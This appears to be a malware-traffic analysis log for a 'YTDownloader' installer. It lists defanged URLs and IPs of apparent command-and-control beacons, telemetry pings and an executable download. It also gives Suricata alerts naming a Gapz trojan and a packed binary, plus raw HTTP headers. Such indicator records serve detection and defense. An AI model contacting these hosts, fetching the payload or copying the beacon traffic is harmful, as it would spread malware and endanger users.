hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=GFrjZskQvqNmS6nlSU/NThXyJo8GcS5h/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/gFOqBGDQz2TLS8QKBdwSe29z1KklHinBKYX3Ti/i3YMgCmKZYKupqaMfrJi9XFVPBHdyxBIzcuFiQ3FzN41YlI2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1U0g9pFu/21ITrGUl3SHv B3WYfPFwahBc= 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=xY8ohDYpM iI4k8LaFSbfxwGEJPpfW5hnvZi s3jtzH3VPP0BYZZ/JwQnkcbjmdiLntfO9v5CwenNguChnjFYxzmkHxvj2IRXcgr8gwCjoRxb8Oz3NykvhuQZCu9SilNqGvv5sqhroCJzCloYCM2TyBeHeUDdpdJ0ATae6NSkcuPFGXl7hYw KKij 6dP1w7xUocEPa3gnWqHhSQCg8CtCUHeR8YCF3QLiqBH6WCl3xZWevahYfV1 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBfHe9cth/iONogRWgA6z07xsaPrTALJM48= 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=AOb NGCDna90cn8dtkQxkERusJn/tOCq/lCDRYG1zoqEh7ps0SQ7EYzpbjeDHyvNqJDnlUORNKJFgAYD7IlOOSp LYLDcsF6Odloy4EgwsYQeCU3GvakyerVyaMS1AoBVcsZgjOTLBig1VAsf0FmYhhjoXbLyE8FyBfkdHFoABfEKmHddSTlr6/u6Si5KcyuceLsPpRf2XIu YgVzu615FhjFLtNp8mV2lEuQvGIR/fg8uwYzFR1r8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rKjwza u12Vx7RZKInXq6ldftzHLLheHCE= 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=I6hFHi0H7G9mS6nlSU/NTiVyAMJyiE6S/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/EV70QiN1eataC2D7gVLsXVWyif 2VH4gFagtWkIz2IRYYxS7TafJldpRLkLxiEf34PLsGMxUda/E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9Kyo8M2vrtdlce0WSiJ16upXX7cxyy4Xhwh 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=bNFVvuIwcz4inMwQKODRlIqiqZmwl1PqIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGG Ruf1p/wWfUh 3ZGDmdW5pZis9f nTddyS4BuUDC9WTdXgG3d7dLtc8OkZQyb4w969Wi5JdYQNAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcbDfhe8VxCPz 198.232.124.192
hxxp://www.ytdownloader.com/app/ping.ashx?action=S_INSTALL&usid=1844237615-1960408961-1801674531&aff=&rnd=&v=1.0.11487.1216&url=&title=&pingtext=Files& protocol=&size=0&ref=&browser= 107.20.238.80
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=/TVH52TeC6QinMwQKODRlGRUqvu659HFIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGDDbltvqAzQDxmCcB9WVISvSrmvhzpIGq0JQd5HxgIXe2KZEzW03QC5KGZ7N/WHCaCHzyr AmlG5QSjSVhgDAFHThq7RcDdX0CipiMYwH g4ekVEtTIIfNSSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkYqi3Apbk6qiCP3BdDD5/c0cA0ak5bBzFhOSDd4/R9r/g== 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=/TVH52TeC6QinMwQKODRlGRUqvu659HFIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGDDbltvqAzQCw6kHnR XV4QBZGQjpShx/0JQd5HxgIXcFljvsbds7FP1MD0RZMJTghpRaG5UbXNBLHocoDBHKKK/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGHSvtnkZb9H9Fc ZH5YnXW9iHRMVKaBRE8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWMc5pB8b49iEV3IK/IMAo6EcW/Ds9zcpL4qcbOV8TZlZQ== 198.232.124.192
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=b1dRW7RxYKcVc8R/SQUwTCKczBAo4NGUZFSq 7rn0cUUMN9W/ 8fb24W0T1hU8VMkYIKgNqWBwS9Kbi6m4oCRiqLcCluTqqII/cF0MPn9zRwDRqTlsHMWP9XPbJELwvM4ER/zOphe9XjDyrjfLHdhwq6l7mVDuU2U7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOT021585MfhStCC/vmINmoCk0XByrlXk6Xa2GUTuqDbKtCUHeR8YCF3Kke2ijo/txBIBrCYEM0Ntm0iRlndgoD0 54.239.168.183
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=I6hFHi0H7G9mS6nlSU/NTuiRTIWym4 0QVpVqTl5/e4gLxC0aXqYrfauHCM4PoUS28zA03xwxN7DRdbCExQ3XkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mdulfay3 QHl32cx0G27ZSGAqR2XPWVGh9o0hxHg3iWEUAvnawhe3hfCt1Zpc0u8z 54.239.168.183
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=I6hFHi0H7G9mS6nlSU/NTuiRTIWym4 0QVpVqTl5/e5zgOiYPM 1xJkMnbu79FzppzYLgoZ4xWMc5pB8b49iEV3IK/IMAo6EcW/Ds9zcpL4bkGQrvUopTfauHCM4PoUS28zA03xwxN7DRdbCExQ3XkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mdulfay3 QHl32cx0G27ZSGAqR2XPWVGh9o0hxHg3iWEUAvnawhe3hTfh8cjilZ M3GKWlWmZ3GY= 54.239.168.183
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/wu.ashx?dsid=1&s=F8Tzamodk0,99999999-9999-4ee6-b5f5-a35f9c2d9d06,&v=2.3.12.1634&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&usetmd5=&bmd5=&hpp=1&spp=1&ntp=1&ubrand=sc 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=uWabAt9SLcwPgAd18hbyrmUt3CZAwIBE/Dn8i7qp5mB38psj3UbutFu0ICSu0QOYghmiZJc6KBe9Kbi6m4oCRiqLcCluTqqII/cF0MPn9zRwDRqTlsHMWP9XPbJELwvM20qHT6WNWM6mY5NIfEeUImHMzOJbNDghLEkZetWvu6sPlKHaI/HhOX8O9MdkgAq0BPEhRyyBD7Az2B3hsM2vVSEmR0fmM6EAe iMFhlMCXZIMYvTWghruEu7UYQsvpwcimSmM1eJuDuHIpRMDfJ5hDuF6IuT3DfqjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw== 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=hNMAVKhukrzd/jwMCMorqnRyfx22RDGQs1FW/TpGzIP UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiGGOhdsvITwVAbULHJpnG/4XOg23g5 yPOzV4mKJhjCiOBvq/txek z4HsrR8MHCWlUGZM/ipg 4PIAIQtwrEX1/kTVIpb8Jsqp9Xc7DttahTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp7 srzHUOTm5Cd3FHp 6lvDMpb3phhqpJJEKkB5GbhZH 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/12466.ashx?e=hNMAVKhukrzd/jwMCMorqnRyfx22RDGQs1FW/TpGzIP UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiORMU9nX4kNMjBc8MQwUMZZmrFmLJ4RM0tNH56RfInM z4gguKWlYXah KANE5N7oCaDOhvvrNRpfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXx3vXLYf4jjaIEVoAOs9O8bGj60wCyTOP 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/12466.ashx?e=hNMAVKhukrzd/jwMCMorqnRyfx22RDGQs1FW/TpGzIP UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiORMU9nX4kNMjBc8MQwUMZZmrFmLJ4RM0tNH56RfInM z4gguKWlYXeP7nOBaVPXWjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw== 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=hNMAVKhukrzd/jwMCMorqnRyfx22RDGQs1FW/TpGzIP UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiGGOhdsvITwVAbULHJpnG/5mrFmLJ4RM0tNH56RfInM z4gguKWlYXfSnAquWIhOHxfjsn07DILhkm3E/dlMY S5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkqfi2Cw3LBejnZaMuBIMLGjDD0PkkuB5A= 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=c2mW1WEUbCFmS6nlSU/NTmTSvfLK6KnR/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/U7MEatNnCEgXCfGg4gcTppNB3Tmp8 xhs IILilpWF0OiEhuPxDpVu4qmcipTkY2jZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw== 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=QHucCbLl /arv6GrtwjWz3Ryfx22RDGQfNujG4MuC7j UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiGGOhdsvITwUjBc8MQwUMZYYsZ7QYFDFnxHXZjfhFnaKOBvq/txek 98kq5tFPGRg8hLIAT6TbharyaFrt1ZytQQr15Tmip jZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw== 198.232.124.192
hxxp://d23ocewf5ttxmu.cloudfront.net/br.ashx?pid={PID}&aid={AID}&ss=0&s=F8Tzamodk0,99999999-9999-4ee6-b5f5-a35f9c2d9d06,&v=2.3.12.1634&md5=c9201ba296c08848dfd3d5e86b7c34eb&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=8AD3F1FB-4DE5-44BF-9F6B-81BABBE96DC1 54.239.168.233
hxxp://d23ocewf5ttxmu.cloudfront.net/br.ashx?pid={PID}&aid={AID}&ss=0&s=F8Tzamodk0,99999999-9999-4ee6-b5f5-a35f9c2d9d06,&v=2.3.12.1634&md5=51a316be89f997dfa063898329266c69&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=8AD3F1FB-4DE5-44BF-9F6B-81BABBE96DC1 54.239.168.233
hxxp://d23ocewf5ttxmu.cloudfront.net/br.ashx?pid={PID}&aid={AID}&bur=1&ss=0&s=F8Tzamodk0,99999999-9999-4ee6-b5f5-a35f9c2d9d06,&v=2.3.12.1634&md5=c9201ba296c08848dfd3d5e86b7c34eb&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=8AD3F1FB-4DE5-44BF-9F6B-81BABBE96DC1 54.239.168.233
hxxp://rep.ytdownloader.com/app/ping.ashx?action=start&userid={C41FEF8F-ADBB-4F68-BEA7-CDD74FDBA6CA}&usid=1844237615-1960408961-1801674531&aff=&v=1.0.11487.1216&url=&title=&pingtext=IGNvbnZlcnRlcjogMy4zLjEuNTsgZHJpdmVyOiBDOlxQcm9ncmFtIEZpbGVzXFlURG93bmxvYWRlclxzYm1udHIuc3lzIDEuMC4wLjI7IGhlbHBlcjogMS4wLjEuNTsgc2VydmljZTogMS4wLjEuNTsA&protocol=&size=0&ref=&browser= 54.197.238.106
hxxp://pwvz71qp-ur1xo6pn.netdna-ssl.com/wu.ashx?dsid=1&s=F8Tzamodk0,99999999-9999-4ee6-b5f5-a35f9c2d9d06,&v=2.3.12.1634&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&usetmd5=&bmd5=&hpp=1&spp=1&ntp=1&ubrand=sc 198.232.124.192
hxxp://otr4vhc-1ghhyl1c.netdna-ssl.com/YTDownloaderFull.exe 198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH6MAVuazOQA/ySFcG0T/jYU B 0jBTIO6c/Y3m6kr9yYrPiCC4paVhduf EAUeb6vWyyBfgdC/MPMTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rKjwza u12Vx7RZKInXq6ldftzHLLheHCE= 198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=I6hFHi0H7G9mS6nlSU/NTiVyAMJyiE6S/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/EV70QiN1eataC2D7gVLsXVWyif 2VH4gFagtWkIz2IRYYxS7TafJldpRLkLxiEf34PLsGMxUda/E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9Kyo8M2vrtdlce0WSiJ16upXX7cxyy4Xhwh 198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH4myeS/0faBVTdVMo67fxO0s IILilpWF0ZnIhubsYOdECOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndBQ5XBQ3qoybyBtdmy6 JukoM3nfY1NxsN F7xXEI/M= 198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH4myeS/0faBVTdVMo67fxO0s IILilpWF2Et8EPpFBXSUCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndBQ5XBQ3qoybyBtdmy6 JukoM3nfY1NxsN F7xXEI/M= 198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/12466.ashx?e=hNMAVKhukrzd/jwMCMorqnRyfx22RDGQs1FW/TpGzIP UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiORMU9nX4kNMjBc8MQwUMZZmrFmLJ4RM0tNH56RfInM z4gguKWlYXeP7nOBaVPXWjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw== 198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWA5Mtw6p9U5dKYX3Ti/i3YNxO48S9k5zx0ojLX6lvBJsJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRiqLcCluTqqII/cF0MPn9zRwDRqTlsHMWE5IN3j9H2v 198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/12466.ashx?e=iAb9K1DDBHUinMwQKODRlCD/q4eoirb7IM0CqmsRfbtxTYwWxYG9WEEY41XBMtFk/h9mchShIbTzFrgVq4jsEiR1q1S/V1rzDyhRDL0PLalNTvXaKqGxaNCUHeR8YCF3BQ8MIYMfS0tAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JoXwql6nKegU 198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/12466.ashx?e=K24uUiBczqdmS6nlSU/NTrtoX8KCsVAM/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGSoNjFwE9Y5NLhu0b45kiT yMyEnHNejvIwWNawbTP05KYX3Ti/i3YObVFZJeaqFdk1VfCEU0AOklTie0zE 5RJfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXx3vXLYf4jjaIEVoAOs9O8bGj60wCyTOP 198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=AOb NGCDna90cn8dtkQxkERusJn/tOCq/lCDRYG1zoqEh7ps0SQ7EYzpbjeDHyvNqJDnlUORNKJFgAYD7IlOOSp LYLDcsF6Odloy4EgwsYQeCU3GvakyerVyaMS1AoBVcsZgjOTLBig1VAsf0FmYhhjoXbLyE8FyBfkdHFoABfEKmHddSTlr6/u6Si5KcyuceLsPpRf2XIu YgVzu615FhjFLtNp8mV2lEuQvGIR/fg8uwYzFR1r8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rKjwza u12Vx7RZKInXq6ldftzHLLheHCE= 198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWKv9x4TEPS62BPEhRyyBD7DR614fwrEG1qQdf661A7a3sYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp7 srzHUOTm5Cd3FHp 6lvDMpb3phhqpJJEKkB5GbhZH 198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWL9PKObAHk8Ms IILilpWF0oVqJUL9ojcMbrniShQ3GQLdA rHOtLvrw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVpXZrelYJPLUrmhU/capljenNguChnjFYxzmkHxvj2IRXcgr8gwCjoRxb8Oz3Nykvipxs5XxNmVl 198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=PcwT4QFtuPDEA05CBT6a0a4CrgF/oVkXhiJeNe9dCpGmy6t0 u4xzf2TEkHeJNDU8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT/XpciovEgse2DHUe356ADpreizXIw2lEXuAG0Hn6RhSl2loKLeLycAJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AmkdnXmY5ntEg== 198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWA2yDM6d7piii11NaYYxcNku1SXIq07tJg ABjx4/MVnPaT JG0G pPE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9Kyo8M2vrtdlce0WSiJ16upXX7cxyy4Xhwh 198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=GFrjZskQvqNmS6nlSU/NThXyJo8GcS5h/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/gFOqBGDQz2TLS8QKBdwSe29z1KklHinBKYX3Ti/i3YMgCmKZYKupqaMfrJi9XFVPBHdyxBIzcuFiQ3FzN41YlI2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1U0g9pFu/21ITrGUl3SHv B3WYfPFwahBc= 198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=Qoli4LW15gtmS6nlSU/NTiWcJxQhCNYt/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT 2Xfi4eCjhjMjKRY6Iofb7pjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVNIPaRbv9tSE6xlJd0h7/gd1mHzxcGoQX 198.232.124.192


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Possible Win32/Gapz MSIE 9 on Windows NT 5
ET POLICY Executable served from Amazon S3
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET /14314.ashx?e=/TVH52TeC6QinMwQKODRlGRUqvu659HFIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGDDbltvqAzQDxmCcB9WVISvSrmvhzpIGq0JQd5HxgIXe2KZEzW03QC5KGZ7N/WHCaCHzyr AmlG5QSjSVhgDAFHThq7RcDdX0CipiMYwH g4ekVEtTIIfNSSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkYqi3Apbk6qiCP3BdDD5/c0cA0ak5bBzFhOSDd4/R9r/g== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:51 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /14314.ashx?e=uWabAt9SLcwPgAd18hbyrmUt3CZAwIBE/Dn8i7qp5mB38psj3UbutFu0ICSu0QOYghmiZJc6KBe9Kbi6m4oCRiqLcCluTqqII/cF0MPn9zRwDRqTlsHMWP9XPbJELwvM20qHT6WNWM6mY5NIfEeUImHMzOJbNDghLEkZetWvu6sPlKHaI/HhOX8O9MdkgAq0BPEhRyyBD7Az2B3hsM2vVSEmR0fmM6EAe iMFhlMCXZIMYvTWghruEu7UYQsvpwcimSmM1eJuDuHIpRMDfJ5hDuF6IuT3DfqjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:53 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /14314.ashx?e=hNMAVKhukrzd/jwMCMorqnRyfx22RDGQs1FW/TpGzIP UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiGGOhdsvITwVAbULHJpnG/5mrFmLJ4RM0tNH56RfInM z4gguKWlYXfSnAquWIhOHxfjsn07DILhkm3E/dlMY S5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkqfi2Cw3LBejnZaMuBIMLGjDD0PkkuB5A= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


